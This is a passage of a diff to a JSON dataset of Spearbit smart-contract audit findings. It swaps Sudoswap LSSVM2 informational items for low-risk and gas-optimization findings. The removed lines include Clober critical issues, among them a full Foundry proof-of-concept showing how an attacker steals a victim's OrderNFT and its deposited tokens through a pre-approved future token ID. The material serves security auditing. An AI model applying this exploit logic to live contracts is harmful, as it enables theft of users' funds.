Then the functions pairVariant() and _immutableParamsLength() can also be moved to LSSVMPair, which would simplify the code.", + "body": "ERC721 NFTs may get locked forever if the recipient cannot handle ERC721 tokens. While safeTransferFrom() is used for ERC1155 NFTs (which has the _doSafeTransferAcceptanceCheck check on the recipient and does not have an option to avoid this), transferFrom() is used for ERC721 NFTs, presumably for gas savings and reentrancy concerns over its safeTransferFrom variant (which has the _checkOnERC721Received check on the recipient).", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Unused values in catch can be avoided for better readability", + "title": "Single-step ownership change introduces risks", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Employing a catch clause with higher verbosity may reduce readability. Solidity supports different kinds of catch blocks depending on the type of error. However, if the error data is of no interest, one can use a simple catch statement without error data.", + "body": "Single-step ownership transfers add the risk of setting an unwanted owner by accident (this includes address(0)) if the ownership transfer is not done with excessive care. The ownership control library Owned by Solmate implements a simple single-step ownership transfer without zero-address checks.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Stale constant and comments reduce readability", + "title": "getAllPairsForSettings() may run out of gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "After some updates, the logic was added ~2 years ago when the enum was changed to int16. Based on the comments, and given that it was upgradeable, it was expected that one could add new unconfigured specs with negative IDs between NONE (by decrementing it) and NOT_CONFIGURED. In this non-upgradeable fork, the current constants treat only the spec ID of 0 as NOT_CONFIGURED. // Anything > NONE and <= NOT_CONFIGURED is considered not configured int16 private constant NONE = -1; int16 private constant NOT_CONFIGURED = 0;", + "body": "The function getAllPairsForSettings() has a loop over pairsForSettings. As the creation of pairs is permissionless, that array could get arbitrarily large. Once the array is large enough, the function will run out of gas. Note: the function is only called from the outside. function getAllPairsForSettings(address settings) external view returns (address[] memory) { uint256 numPairs = pairsForSettings[settings].length(); ... for (uint256 i; i < numPairs;) { ... unchecked { ++i; } } ... }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Different MAX_FEE values and comments in different places are misleading", + "title": "Partially implemented SellOrderWithPartialFill functionality may cause unexpected behavior", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The same MAX_FEE constant is declared in different files with different values, while comments indicate that these values should be the same. 
// 50%, must <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory) uint256 internal constant MAX_FEE = 0.5e18; uint256 internal constant MAX_PROTOCOL_FEE = 0.1e18; // 10%, must <= 1 - MAX_FEE`", + "body": "Sell orders are only fully executed when pair.spotPrice() == order.expectedSpotPrice in a swap. This may be confusing to users who expect partial fills in both directions but notice unexpected behavior if deployed as-is. While the BuyOrderWithPartialFill functionality is fully implemented, the corresponding SellOrderWithPartialFill feature is only partially implemented, with getNFTQuoteForSellOrderWithPartialFill, an incomplete _findMaxFillableAmtForSell (placeholder comment: \"// TODO: implement\") and other supporting logic required in swap().", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Events without indexed event parameters make it harder/inefficient for off-chain tools", + "title": "Lack of deadline checks for certain swap functions allows greater exposure to volatile market prices", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Indexed event fields make them quickly accessible to off-chain tools that parse events. However, note that each indexed field costs extra gas during emission; so it's not necessarily best to index the maximum allowed per event (three fields).", + "body": "Many swap functions in LSSVMRouter use the checkDeadline modifier to prevent swaps from executing beyond a certain user-specified deadline. This is presumably to reduce exposure to volatile market prices on top of the thresholds of maxCost for buys and minOutput for sells. However, the two router functions robustSwapETHForSpecificNFTsAndNFTsToToken and robustSwapERC20ForSpecificNFTsAndNFTsToToken in LSSVMRouter and all functions in VeryFastRouter are missing this modifier and the user parameter required for it. Users attempting to swap using these two swap functions do not have a way to specify a deadline for their execution, unlike with the other swap functions in this router. If the front-end does not highlight or warn about this, then the user swaps may get executed after a long time, depending on the tip included in the transaction and the network congestion. This causes greater exposure for the swaps to volatile market prices.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational PropertyCheckerFactory.sol#L11, LSSVMPair.sol#L83," + "Severity: Low Risk" ] }, { - "title": "Some functions included in LSSVMPair are not found in ILSSVMPair.sol and ILSSVMPairFactoryLike.sol", + "title": "Missing function to deposit ERC1155 NFTs after pair creation", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The LSSVMPair contract defines the following functions which are missing from the interface ILSSVMPair: ROYALTY_ENGINE() spotPrice() delta() assetRecipient() pairVariant() factory() swapNFTsForToken() (2 versions) swapTokenForSpecificNFTs() getSellNFTQuoteWithRoyalties() call() withdrawERC1155()", + "body": "Functions depositNFTs() and depositERC20() are apparently used to deposit ERC721 NFTs and ERC20s into appropriate pairs after their creation. According to the project team, this is used \"for various UIs to consolidate approvals + emit a canonical event for deposits.\" However, an equivalent function for depositing ERC1155 NFTs is missing; a hypothetical equivalent is sketched below. 
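A hypothetical equivalent, mirroring the validate-and-emit conventions described for depositNFTs() (the signature and event name are assumptions):
function depositERC1155(IERC1155 nft, uint256 id, uint256 amount, address recipient) external {
    nft.safeTransferFrom(msg.sender, recipient, id, amount, bytes(\"\"));
    // emit the canonical deposit event only for valid ERC1155 pairs, as depositNFTs() does for ERC721
    if (isPair(recipient, ILSSVMPairFactoryLike.PairVariant.ERC1155_ETH)
        || isPair(recipient, ILSSVMPairFactoryLike.PairVariant.ERC1155_ERC20)) {
        emit ERC1155Deposit(recipient); // hypothetical event
    }
}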
This prevents ERC1155 NFTs from being deposited into pairs after creation in scenarios similar to those anticipated for ERC721 NFTs and ERC20 tokens.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Low Risk" ] }, { - "title": "Absent/Incomplete Natspec affects readability and maintenance", + "title": "Reading from state is more gas expensive than using msg.sender", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Comments are key to understanding the codebase logic. In particular, Natspec comments provide rich documentation for functions, return variables and more. This documentation aids users, developers and auditors in understanding what the functions within the contract are meant to do. However, some functions within the codebase contain issues with respect to their comments, with either no Natspec or incomplete Natspec annotations, leading to partial descriptions of the functions.", + "body": "Solmate's Owned.sol contract implements the concept of ownership (by saving the deployer in the owner state variable during contract construction) and owner-exclusive functions via the onlyOwner() modifier. Therefore, within functions protected by the onlyOwner() modifier, the addresses stored in msg.sender and owner will be equal. So, if such a function has to make use of the address of the owner, it is cheaper to use msg.sender than owner, because the latter reads from the contract state (using the SLOAD opcode) while the former doesn't (the address is directly retrieved via the cheaper CALLER opcode). Reading from state (the SLOAD opcode, which costs either 100 or 2100 gas units) costs more gas than using the msg.sender environment variable (the CALLER opcode, which costs 2 units of gas). Note: withdrawERC20() already uses msg.sender. function withdrawETH(uint256 amount) public onlyOwner { payable(owner()).safeTransferETH(amount); ... } function withdrawERC20(ERC20 a, uint256 amount) external override onlyOwner { a.safeTransfer(msg.sender, amount); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational IOwnershipTransferReceiver.sol#L6, OwnableWithTransferCallback.sol#L39-L42, RangeProp-" + "Severity: Gas Optimization" ] }, { - "title": "MAX_SETTABLE_FEE value does not follow a standard notation", + "title": "pair.factory().protocolFeeMultiplier() is read from storage on every iteration of the loop wasting gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The protocol establishes several constant hard-coded MAX_FEE-like variables across different contracts. The percentages expressed in those variables should be declared in a standard way all over the codebase. In StandardSettings.sol#L22, the standard followed by the rest of the codebase is not respected. Not respecting the standard notation may confuse the reader.", + "body": "Not caching storage variables that are accessed multiple times within a loop causes a waste of gas. If not cached, the Solidity compiler will always read the value of protocolFeeMultiplier from storage during each iteration. For a storage variable, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first); a hoisted read is sketched below. 
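A sketch of the hoisted read, based on the loop shape quoted earlier in this section:
uint256 protocolFeeMultiplier = pair.factory().protocolFeeMultiplier(); // single read, outside the loop
for (uint256 i; i < numNFTs; i++) {
    uint256 price;
    (, spotPrice, delta, price,,) =
        pair.bondingCurve().getBuyInfo(spotPrice, delta, 1, fee, protocolFeeMultiplier);
}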
In contrast, for a memory variable, it implies only extra MLOAD operations (3 additional gas for each iteration beyond the first).", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "No modifier for __Ownable_init", + "title": "The use of factory in ERC1155._takeNFTsFromSender() can be via a parameter rather than calling factory() again", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Usually __Ownable_init also has a modifier like initializer or onlyInitializing, see OwnableUpgradeable.sol#L29. The version in OwnableWithTransferCallback.sol doesn't have this. It is not really necessary as the function is internal, but it is more robust if it does. function __Ownable_init(address initialOwner) internal { _owner = initialOwner; }", + "body": "factory is sent as a parameter to _takeNFTsFromSender in LSSVMPairERC721.sol#L179, which saves gas because the value does not have to be read again. _takeNFTsFromSender(IERC721(nft()), nftIds, _factory, isRouter, routerCaller); However, in LSSVMPairERC1155.sol#L181, the similar function _takeNFTsFromSender() gets the value by calling factory() instead of using a parameter. _takeNFTsFromSender(IERC1155(nft()), numNFTs[0], isRouter, routerCaller); This creates an unnecessary asymmetry between the two contracts, which are expected to be similar, and also misses a possible gas optimization by avoiding a call to the factory getter.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Wrong value of seconds in year slightly affects precision", + "title": "Variables only set at construction time could be made immutable", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The calculation of ONE_YEAR_SECS takes into account leap years (typically 365.25 days), aiming for the most exact precision. However, as can be seen at NASA and stackoverflow, the value is slightly different. Current case: 365.2425 days = 31_556_952 / (24 * 3600) NASA case: 365.2422 days = 31_556_926 / (24 * 3600)", + "body": "immutable variables can be assigned either at construction time or at declaration time, and only once. The contract creation code generated by the compiler will modify the contract's runtime code before it is returned by replacing all references to immutable variables with the values assigned to them; so the compiler does not reserve a storage slot for these variables. Declaring variables only set at construction time as immutable results in saving one SSTORE (0x55) opcode call per variable, thus saving gas during construction.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Missing idempotent checks may be added for consistency", + "title": "Hoisting check out of loop will save gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Setter functions could check if the value being set is the same as the variable's existing value to avoid doing a state variable write in such scenarios, and they could also revert to flag potentially mismatched offchain-onchain states. 
While this is done in many places, there are a few setters missing this check.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Missing events affect transparency and monitoring", + "title": "Functionality of safeBatchTransferFrom() is not used", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Missing events in critical functions, especially privileged ones, reduce transparency and ease of monitoring. Users may be surprised at changes effected by such functions without being able to observe related events.", + "body": "The function pairTransferERC1155From() allows the transfer of multiple ids of ERC1155 NFTs. The rest of the code only uses one id at a time. Using safeTransferFrom() instead of safeBatchTransferFrom() might be better, as it only accesses one id and uses less gas because no for loop is necessary. However, future versions of Sudoswap might support multiple ids; in that case it's better to leave it as is. function pairTransferERC1155From(..., uint256[] calldata ids, uint256[] calldata amounts,...) ... { ... nft.safeBatchTransferFrom(from, to, ids, amounts, bytes(\"\")); }", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational LSSVMPair.sol#L640-L645, LSSVMPairFactory.sol#L485-L492, LSSVMPairFactory.sol#L501-L508," + "Severity: Gas Optimization" ] }, { - "title": "Wrong error returned affects debugging and off-chain monitoring", + "title": "Using != 0 instead of > 0 can save gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Error.INVALID_NUMITEMS is declared for the 0 case, but is returned twice in the same function: the first time for numItems == 0 and the second time for numItems >= nftBalance. This can make it hard to know why it is failing.", + "body": "When dealing with unsigned integer types, comparisons with != 0 are 3 gas cheaper than > 0.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Functions can be renamed for clarity and consistency", + "title": "Using >>1 instead of /2 can save gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "Since both functions cloneETHPair() and cloneERC20Pair() use IERC721 nft as a parameter, renaming them to cloneERC721ETHPair() and cloneERC721ERC20Pair() respectively makes it clearer that the functions process ERC721 tokens. This also provides consistency in the naming of functions, considering that we already have the function cloneERC1155ETHPair() using this nomenclature.", + "body": "A division by 2 can be calculated by shifting one to the right (>>1). 
"labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Two events TokenDeposit() with different parameters", + "title": "Retrieval of ether balance of contract can be gas optimized", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The event TokenDeposit() of LSSVMPairFactory has an address parameter while the event TokenDeposit() of LSSVMPair has a uint256 parameter. This might be confusing. contract LSSVMPairFactory { ... event TokenDeposit(address poolAddress); ... } abstract contract LSSVMPair ... { ... event TokenDeposit(uint256 amount); ... }", + "body": "The retrieval of the ether balance of a contract is typically done with address(this).balance. However, by using an assembly block and the selfbalance() instruction, one can get the balance at a discount of 15 units of gas.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] },
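A minimal sketch of the selfbalance() technique mentioned above; the function name is hypothetical:

function ethBalance() internal view returns (uint256 bal) {
    assembly {
        bal := selfbalance() // SELFBALANCE is cheaper than address(this).balance
    }
}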
{ - "title": "Unused imports affect readability", + "title": "Function parameters should be validated at the very beginning for gas optimizations", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The following imports are unused in XykCurve.sol import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {LSSVMPair} from \"../LSSVMPair.sol\"; import {LSSVMPairERC20} from \"../LSSVMPairERC20.sol\"; import {LSSVMPairCloner} from \"../lib/LSSVMPairCloner.sol\"; import {ILSSVMPairFactoryLike} from \"../LSSVMPairFactory.sol\"; LSSVMPairERC20.sol import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {ICurve} from \"./bonding-curves/ICurve.sol\"; import {CurveErrorCodes} from \"./bonding-curves/CurveErrorCodes.sol\"; LSSVMPairETH.sol import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {ICurve} from \"./bonding-curves/ICurve.sol\";", + "body": "Function parameters should be validated at the very beginning of the function to allow typical execution paths and revert on the exceptional paths, which will lead to gas savings over validating later.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] }, { - "title": "Use of isPair() is not intuitive", + "title": "Loop counters are not gas optimized in some places", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "There are two usecases for isPair() 1) To check if the contract is a pair of any of the 4 types. Here the type is always retrieved via pairVariant(). 2) To check if a pair is ETH / ERC20 / ERC721 / ERC1155. Each of these values is represented by two different pair types. Using isPair() this way is not intuitive and some errors have been made in the code where only one value is tested. Note: also see issue \"pairTransferERC20From only supports ERC721 NFTs\". Function isPair() could be refactored to make the code easier to read and maintain. function isPair(address potentialPair, PairVariant variant) public view override returns (bool) { ... } These are the occurrences of use case 1: LSSVMPairFactory.sol: require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); (two occurrences) LSSVMPairFactory.sol: if (isPair(recipient, LSSVMPair(recipient).pairVariant())) { // router interaction, which first queries `pairVariant()` LSSVMPairERC20.sol: router.pairTransferERC20From(..., pairVariant()); (three occurrences) erc721/LSSVMPairERC721.sol: router.pairTransferNFTFrom(..., pairVariant()); (two occurrences) erc1155/LSSVMPairERC1155.sol: router.pairTransferERC1155From(..., pairVariant()); // router and VeryFastRouter: function pairTransferERC20From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } function pairTransferNFTFrom(..., ILSSVMPairFactoryLike.PairVariant variant) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } function pairTransferERC1155From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } These are the occurrences of use case 2: LSSVMPairFactory.sol: (isPair(...ERC721_ERC20) || isPair(...ERC1155_ERC20)) StandardSettings.sol: isPair(...ERC721_ETH) || isPair(...ERC1155_ETH) StandardSettings.sol: isPair(...ERC721_ERC20) || isPair(...ERC1155_ERC20) StandardSettings.sol: isPair(...ERC721_ETH) || isPair(...ERC1155_ETH) StandardSettings.sol: isPair(...ERC721_ERC20) || isPair(...ERC1155_ERC20)", + "body": "Loop counters are optimized in many parts of the code by using an unchecked {++i} (unchecked + prefix increment). However, this is not done in some places where it is safe to do so.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization MerklePropertyChecker.sol#L22," ] },
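For illustration, a minimal sketch of the unchecked prefix-increment loop pattern the finding refers to; the function is hypothetical:

function visitAll(uint256[] memory ids) internal pure {
    for (uint256 i; i < ids.length; ) {
        // ... work with ids[i] ...
        unchecked { ++i; } // overflow impossible: i is bounded by ids.length
    }
}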
{ - "title": "Royalty related code spread across different contracts affects readability", + "title": "Mixed use of custom errors and revert strings is inconsistent and uses extra gas", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", - "body": "The contract LSSVMPairFactory contains the function authAllowedForToken(), which has a lot of interactions with external contracts related to royalties. The code is rather similar to code that is present in the RoyaltyEngine contract. Combining this code in the RoyaltyEngine contract would make the code cleaner and easier to read.", + "body": "In some parts of the code, custom errors are declared and later used (CurveErrorCodes and Ownable Errors), while in other parts, classic revert strings are used in require statements. Instead of using error strings, custom errors can be used, which would reduce deployment and runtime costs. Using only custom errors would improve consistency and gas cost. This would also avoid long revert strings which consume extra gas. Each extra memory word of bytes past the original 32 incurs an MSTORE which costs 3 gas. This happens at LSSVMPair.sol#L133, LSSVMPair.sol#L666 and LSSVMPairFactory.sol#L505.", "labels": [ "Spearbit", "SudoswapLSSVM2", - "Severity: Informational" + "Severity: Gas Optimization" ] },
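A minimal sketch of the custom-error pattern recommended above; the error name is hypothetical:

error InvalidPairAddress(); // 4-byte selector instead of an ABI-encoded revert string

function ensurePair(bool ok) internal pure {
    if (!ok) revert InvalidPairAddress();
}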
\"blocked\" \"blocked\" \"blocked\" 5 In real life all *-USDC and USDC-* pairs as well as other pairs where a single token implements a block list are affected. The issue is also appealing to the attacker as at any time if the attacker controls the blacklisted wallet address, he/she can transfer the unclaimable OrderNFT to a whitelisted address to claim his/her assets and to enable processing until the next broken order is placed in the cyclic buffer. It can be used either to manipulate the market by blocking certain types of orders per given price points or simply to blackmail the DAO to resume operations.", + "title": "Array length read in each iteration of the loop wastes gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "If not cached, the Solidity compiler will always read the length of the array from storage during each iteration. For storage array, this implies extra SLOAD operations (100 additional gas for each iteration beyond the first). In contrast, for a memory array, it implies extra MLOAD operations (3 additional gas for each iteration beyond the first).", "labels": [ "Spearbit", - "Clober", - "Severity: Critical Risk" + "SudoswapLSSVM2", + "Severity: Gas Optimization LSSVMPairERC1155.sol, LSSVMPairETH.sol, LSSVMPairERC721.sol," ] }, { - "title": "Overflow in SegmentedSegmentTree464", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "SegmentedSegmentTree464.update needs to perform an overflow check in case the new value is greater than the old value. This overflow check is done when adding the new difference to each node in each layer (using addClean). Furthermore, there's a final overflow check by adding up all nodes in the first layer in total(core). However, in total, the nodes in individual groups are added using DirtyUint64.sumPackedUnsafe: function total(Core storage core) internal view returns (uint64) { return DirtyUint64.sumPackedUnsafe(core.layers[0][0], 0, _C) + DirtyUint64.sumPackedUnsafe(core.layers[0][1], 0, _C); } The nodes in a group can overflow without triggering an overflow & revert. The impact is that the order book depth and claim functionalities break for all users. 6 // SPDX-License-Identifier: BUSL-1.1 pragma solidity ^0.8.0; import \"forge-std/Test.sol\"; import \"forge-std/StdJson.sol\"; import \"../../contracts/mocks/SegmentedSegmentTree464Wrapper.sol\"; contract SegmentedSegmentTree464Test is Test { using stdJson for string; uint32 private constant _MAX_ORDER = 2**15; SegmentedSegmentTree464Wrapper testWrapper; function setUp() public { testWrapper = new SegmentedSegmentTree464Wrapper(); } function testTotalOverflow() public { uint64 half64 = type(uint64).max / 2 + 1; testWrapper.update(0, half64); // map to the right node of layer 0, group 0 testWrapper.update(_MAX_ORDER / 2 - 1, half64); assertEq(testWrapper.total(), 0); } }", + "title": "Not tightly packing struct variables consumes extra storage slots and gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Gas efficiency can be achieved by tightly packing structs. 
{ - "title": "Overflow in SegmentedSegmentTree464", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "SegmentedSegmentTree464.update needs to perform an overflow check in case the new value is greater than the old value. This overflow check is done when adding the new difference to each node in each layer (using addClean). Furthermore, there's a final overflow check by adding up all nodes in the first layer in total(core). However, in total, the nodes in individual groups are added using DirtyUint64.sumPackedUnsafe: function total(Core storage core) internal view returns (uint64) { return DirtyUint64.sumPackedUnsafe(core.layers[0][0], 0, _C) + DirtyUint64.sumPackedUnsafe(core.layers[0][1], 0, _C); } The nodes in a group can overflow without triggering an overflow & revert. The impact is that the order book depth and claim functionalities break for all users. // SPDX-License-Identifier: BUSL-1.1 pragma solidity ^0.8.0; import \"forge-std/Test.sol\"; import \"forge-std/StdJson.sol\"; import \"../../contracts/mocks/SegmentedSegmentTree464Wrapper.sol\"; contract SegmentedSegmentTree464Test is Test { using stdJson for string; uint32 private constant _MAX_ORDER = 2**15; SegmentedSegmentTree464Wrapper testWrapper; function setUp() public { testWrapper = new SegmentedSegmentTree464Wrapper(); } function testTotalOverflow() public { uint64 half64 = type(uint64).max / 2 + 1; testWrapper.update(0, half64); // map to the right node of layer 0, group 0 testWrapper.update(_MAX_ORDER / 2 - 1, half64); assertEq(testWrapper.total(), 0); } }", + "title": "Not tightly packing struct variables consumes extra storage slots and gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Gas efficiency can be achieved by tightly packing structs. Struct members are stored in 32-byte slots, so smaller types can be grouped together to occupy fewer slots.", "labels": [ "Spearbit", - "Clober", - "Severity: Critical Risk" + "SudoswapLSSVM2", + "Severity: Gas Optimization" ] },
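A minimal sketch of struct packing; the struct is hypothetical, with field sizes chosen so the two 16-byte values share one 32-byte slot:

struct PackedPair {
    uint128 spotPrice; // slot 0, bytes 0-15
    uint128 delta;     // slot 0, bytes 16-31
    address owner;     // slot 1
}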
{ - "title": "OrderNFT theft due to controlling future and past tokens of same order index", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The order queue is implemented as a ring buffer; to get an order (Orderbook.getOrder) the index in the queue is computed as orderIndex % _MAX_ORDER. The owner of an OrderNFT also uses this function. function _getOrder(OrderKey calldata orderKey) internal view returns (Order storage) { return _getQueue(orderKey.isBid, orderKey.priceIndex).orders[orderKey.orderIndex & _MAX_ORDER_M]; } CloberOrderBook(market).getOrder(decodeId(tokenId)).owner Therefore, the current owner of the NFT of orderIndex also owns all NFTs with orderIndex + k * _MAX_ORDER. An attacker can set approvals of future token IDs to themselves. These approvals are not cleared on OrderNFT.onMint when a victim mints this future token ID, allowing the attacker to steal the NFT and cancel the NFT to claim their tokens. // SPDX-License-Identifier: BUSL-1.1 pragma solidity ^0.8.0; import \"forge-std/Test.sol\"; import \"../../../../contracts/interfaces/CloberMarketSwapCallbackReceiver.sol\"; import \"../../../../contracts/mocks/MockQuoteToken.sol\"; import \"../../../../contracts/mocks/MockBaseToken.sol\"; import \"../../../../contracts/mocks/MockOrderBook.sol\"; import \"../../../../contracts/markets/VolatileMarket.sol\"; import \"../../../../contracts/OrderNFT.sol\"; import \"../utils/MockingFactoryTest.sol\"; import \"./Constants.sol\"; contract ExploitsTest is Test, CloberMarketSwapCallbackReceiver, MockingFactoryTest { struct Return { address tokenIn; address tokenOut; uint256 amountIn; uint256 amountOut; uint256 refundBounty; } struct Vars { uint256 inputAmount; uint256 outputAmount; uint256 beforePayerQuoteBalance; uint256 beforePayerBaseBalance; uint256 beforeTakerQuoteBalance; uint256 beforeOrderBookEthBalance; } MockQuoteToken quoteToken; MockBaseToken baseToken; MockOrderBook orderBook; OrderNFT orderToken; function setUp() public { quoteToken = new MockQuoteToken(); baseToken = new MockBaseToken(); } function cloberMarketSwapCallback( address tokenIn, address tokenOut, uint256 amountIn, uint256 amountOut, bytes calldata data ) external payable { if (data.length != 0) { Return memory expectedReturn = abi.decode(data, (Return)); assertEq(tokenIn, expectedReturn.tokenIn, \"ERROR_TOKEN_IN\"); assertEq(tokenOut, expectedReturn.tokenOut, \"ERROR_TOKEN_OUT\"); assertEq(amountIn, expectedReturn.amountIn, \"ERROR_AMOUNT_IN\"); assertEq(amountOut, expectedReturn.amountOut, \"ERROR_AMOUNT_OUT\"); assertEq(msg.value, expectedReturn.refundBounty, \"ERROR_REFUND_BOUNTY\"); } IERC20(tokenIn).transfer(msg.sender, amountIn); } function _createOrderBook(int24 makerFee, uint24 takerFee) private { orderToken = new OrderNFT(); orderBook = new MockOrderBook( address(orderToken), address(quoteToken), address(baseToken), 1, 10**4, makerFee, takerFee, address(this) ); orderToken.init(\"\", \"\", address(orderBook), address(this)); uint256 _quotePrecision = 10**quoteToken.decimals(); quoteToken.mint(address(this), 1000000000 * _quotePrecision); quoteToken.approve(address(orderBook), type(uint256).max); uint256 _basePrecision = 10**baseToken.decimals(); baseToken.mint(address(this), 1000000000 * _basePrecision); baseToken.approve(address(orderBook), type(uint256).max); } function _buildLimitOrderOptions(bool isBid, bool postOnly) private pure returns (uint8) { return (isBid ? 1 : 0) + (postOnly ? 2 : 0); } uint256 private constant _MAX_ORDER = 2**15; // 32768 uint256 private constant _MAX_ORDER_M = 2**15 - 1; // % 32768 function testExploit2() public { _createOrderBook(0, 0); address attacker = address(0x1337); address attacker2 = address(0x1338); address victim = address(0xbabe); // Step 1. Attacker creates an ASK limit order and receives NFT uint16 priceIndex = 100; uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: attacker, priceIndex: priceIndex, rawAmount: 0, baseAmount: 1e18, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); // Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ambiguous tokenIds CloberOrderBook.OrderKey memory orderKey = CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex}); uint256 currentTokenId = orderToken.encodeId(orderKey); orderKey.orderIndex += _MAX_ORDER; uint256 futureTokenId = orderToken.encodeId(orderKey); // Step 3. Attacker approves the futureTokenId to themselves, and cancels the current id vm.startPrank(attacker); orderToken.approve(attacker2, futureTokenId); CloberOrderBook.OrderKey[] memory orderKeys = new CloberOrderBook.OrderKey[](1); orderKeys[0] = orderKey; orderKeys[0].orderIndex = orderIndex; // restore original orderIndex orderBook.cancel(attacker, orderKeys); vm.stopPrank(); // Step 4. attacker fills queue, victim creates their order, recycling orderIndex 0 uint256 victimOrderSize = 1e18; for(uint256 i = 0; i < _MAX_ORDER; i++) { orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: i < _MAX_ORDER - 1 ? attacker : victim, priceIndex: priceIndex, rawAmount: 0, baseAmount: victimOrderSize, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); } assertEq(orderToken.ownerOf(futureTokenId), victim); // Step 5. Attacker steals the NFT and can cancel to receive the tokens vm.startPrank(attacker2); orderToken.transferFrom(victim, attacker, futureTokenId); vm.stopPrank(); assertEq(orderToken.ownerOf(futureTokenId), attacker); uint256 baseBalanceBefore = baseToken.balanceOf(attacker); vm.startPrank(attacker); orderKeys[0].orderIndex = orderIndex + _MAX_ORDER; orderBook.cancel(attacker, orderKeys); vm.stopPrank(); assertEq(baseToken.balanceOf(attacker) - baseBalanceBefore, victimOrderSize); } }", + "title": "Variables that are redeclared in each loop iteration can be declared once outside the loop", + "html_url": 